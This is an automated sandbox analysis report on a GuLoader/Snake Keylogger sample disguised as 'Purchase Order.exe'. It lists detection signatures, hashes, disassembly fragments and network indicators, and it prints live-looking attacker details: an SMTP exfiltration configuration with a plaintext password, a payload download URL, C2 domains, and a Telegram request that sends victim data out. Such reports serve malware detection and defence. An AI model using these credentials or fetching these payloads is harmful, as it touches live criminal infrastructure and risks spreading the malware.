Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name: Purchase Order.exe
Analysis ID: 1538474
MD5: 46ae79c53627f188d4c316adb7635524
SHA1: 653fc3ca8b9e79295a59428fe0842ec79060fb75
SHA256: 05ca345e803d5783617f8b14194428eb79aa486e0b239ae5656847363729a703
Tags: exe, user-TeamDreier

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "aridons@falconcables.info", "Password": "7213575aceACE@@", "Host": "hosting1.ro.hostsailor.com", "Port": "587", "Version": "4.4"}
Source: Purchase Order.exe Virustotal: Detection: 12%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: Purchase Order.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49977 version: TLS 1.0
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49985 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: Purchase Order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_0040270B FindFirstFileA, 0_2_0040270B
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004061FB FindFirstFileA,FindClose, 0_2_004061FB
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405799
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_0040270B FindFirstFileA, 4_2_0040270B
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_004061FB FindFirstFileA,FindClose, 4_2_004061FB
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_00405799 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_00405799
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Users\user\Desktop\Purchase Order.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_0011F4D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_0011FB03
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 4_2_0011FCE3
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB2131h 4_2_39AB1E80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB26F8h 4_2_39AB22E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABD829h 4_2_39ABD580
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABDC81h 4_2_39ABD9D8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABD3D1h 4_2_39ABD128
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABCF79h 4_2_39ABCCD0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABC6C9h 4_2_39ABC420
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABCB21h 4_2_39ABC878
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB021Dh 4_2_39AB0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB0BA7h 4_2_39AB0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABFAE9h 4_2_39ABF840
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABF239h 4_2_39ABEF90
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABF691h 4_2_39ABF3E8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABEDE1h 4_2_39ABEB38
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABE531h 4_2_39ABE288
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABE989h 4_2_39ABE6E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB26F8h 4_2_39AB22D6
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39AB26F8h 4_2_39AB2626
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39ABE0D9h 4_2_39ABDE30
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA8E28h 4_2_39CA8B58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA7A5Dh 4_2_39CA7720
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA1CF9h 4_2_39CA1A50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA4471h 4_2_39CA41C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA6869h 4_2_39CA65C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAF68Eh 4_2_39CAF3C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA5E81h 4_2_39CA5BD8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAD69Eh 4_2_39CAD3D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAB6AEh 4_2_39CAB3E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA18A1h 4_2_39CA15F8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA5A29h 4_2_39CA5780
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAE44Eh 4_2_39CAE180
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAC45Eh 4_2_39CAC190
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA1449h 4_2_39CA11A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA2E59h 4_2_39CA2BB0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA0FF1h 4_2_39CA0D48
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAD20Eh 4_2_39CACF40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA2A01h 4_2_39CA2758
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAB21Eh 4_2_39CAAF50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov esp, ebp 4_2_39CAA968
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA25A9h 4_2_39CA2300
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CABFCEh 4_2_39CABD00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA55D1h 4_2_39CA5328
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAF1FEh 4_2_39CAEF30
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA7571h 4_2_39CA72C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAAD8Eh 4_2_39CAAAC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA5179h 4_2_39CA4ED0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CADFBEh 4_2_39CADCF0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA0B99h 4_2_39CA08F0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA0741h 4_2_39CA0498
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA2151h 4_2_39CA1EA8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAED6Eh 4_2_39CAEAA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CACD7Eh 4_2_39CACAB0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA02E9h 4_2_39CA0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAFB1Eh 4_2_39CAF850
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CADB2Eh 4_2_39CAD860
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA4D21h 4_2_39CA4A78
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA7119h 4_2_39CA6E70
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CABB3Eh 4_2_39CAB870
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA32B1h 4_2_39CA3008
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA6CC1h 4_2_39CA6A18
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAE8DEh 4_2_39CAE610
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then mov esp, ebp 4_2_39CAA829
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA48C9h 4_2_39CA4620
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CAC8EEh 4_2_39CAC620
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39CA62DBh 4_2_39CA6030
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D15A27h 4_2_39D156B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D16050h 4_2_39D15D58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1079Eh 4_2_39D104D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D181C8h 4_2_39D17ED0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D119A6h 4_2_39D116D8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1ACD0h 4_2_39D1A9D8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1C4B8h 4_2_39D1C1C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D13996h 4_2_39D136C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1EFC0h 4_2_39D1ECC8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D110BEh 4_2_39D10DF0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D194E8h 4_2_39D191F0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D122C6h 4_2_39D11FF8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1BFF0h 4_2_39D1BCF8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1D7D8h 4_2_39D1D4E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D142B7h 4_2_39D13FE8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D169E0h 4_2_39D166E8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1F488h 4_2_39D1F190
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D15066h 4_2_39D14D98
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D18690h 4_2_39D18398
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D11527h 4_2_39D11280
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D19E78h 4_2_39D19B80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D12756h 4_2_39D12488
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1C980h 4_2_39D1C688
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D16EA8h 4_2_39D16BB0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D199B0h 4_2_39D196B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1B198h 4_2_39D1AEA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D13076h 4_2_39D12DA8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1DCA0h 4_2_39D1D9A8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1CE48h 4_2_39D1CB50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D13E26h 4_2_39D13B58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1F950h 4_2_39D1F658
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1030Eh 4_2_39D10040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D17838h 4_2_39D17540
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1A340h 4_2_39D1A048
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1E168h 4_2_39D1DE70
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D14746h 4_2_39D14478
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D17370h 4_2_39D17078
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D10C2Eh 4_2_39D10960
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D18B58h 4_2_39D18860
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D11E36h 4_2_39D11B68
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1B660h 4_2_39D1B368
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1A808h 4_2_39D1A510
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D12BE6h 4_2_39D12918
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1D310h 4_2_39D1D018
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1EAF8h 4_2_39D1E800
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D14BD6h 4_2_39D14908
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D17D00h 4_2_39D17A08
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1BB28h 4_2_39D1B830
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D13506h 4_2_39D13238
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1E630h 4_2_39D1E338
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D16518h 4_2_39D16220
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D1FE19h 4_2_39D1FB20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D154F6h 4_2_39D15228
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D19020h 4_2_39D18D28
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D41658h 4_2_39D41360
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D40CC8h 4_2_39D409D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D40800h 4_2_39D40508
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D41190h 4_2_39D40E98
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then jmp 39D40338h 4_2_39D40040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA34A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA3490
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA0027
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4x nop then lea esp, dword ptr [ebp-04h] 4_2_39EA0356

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2021/10/2024%20/%2017:55:09%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220
Source: Joe Sandbox View IP Address: 188.114.97.3
Source: Joe Sandbox View IP Address: 193.122.130.0
Source: Joe Sandbox View ASN Name: TELEGRAMRU
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49975 -> 84.38.129.16:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49979 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49976 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49981 -> 193.122.130.0:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49985 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49987 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49980 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49978 -> 188.114.97.3:443
Source: global traffic HTTP traffic detected: GET /efxSlCP242.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: 84.38.129.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknown TCP traffic detected without corresponding DNS query: 84.38.129.16
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx/1.18.0
  Date: Mon, 21 Oct 2024 09:30:53 GMT
  Content-Type: application/json
  Content-Length: 55
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: Purchase Order.exe, 00000004.00000002.3364746506.0000000007E60000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://84.38.129.16/efxSlCP242.bin
Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://84.38.129.16/efxSlCP242.binJ
Source: Purchase Order.exe, 00000004.00000002.3364386866.0000000006354000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://84.38.129.16/efxSlCP242.binn
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: Purchase Order.exe, Purchase Order.exe, 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Purchase Order.exe, 00000000.00000000.2111963143.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000004.00000002.3360610483.0000000000409000.00000008.00000001.01000000.00000003.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036831000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Purchase Order.exe, 00000004.00000002.3384062771.0000000036915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20a
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Purchase Order.exe, 00000004.00000002.3384062771.000000003692F000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.0000000036A17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Purchase Order.exe, 00000004.00000002.3384062771.00000000369E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Purchase Order.exe, 00000004.00000002.3384062771.000000003687A000.00000004.00000800.00020000.00000000.sdmp, Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: Purchase Order.exe, 00000004.00000002.3384062771.000000003687A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
Source: Purchase Order.exe, 00000004.00000002.3384062771.00000000368EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
Source: Purchase Order.exe, 00000004.00000002.3385180185.0000000037851000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
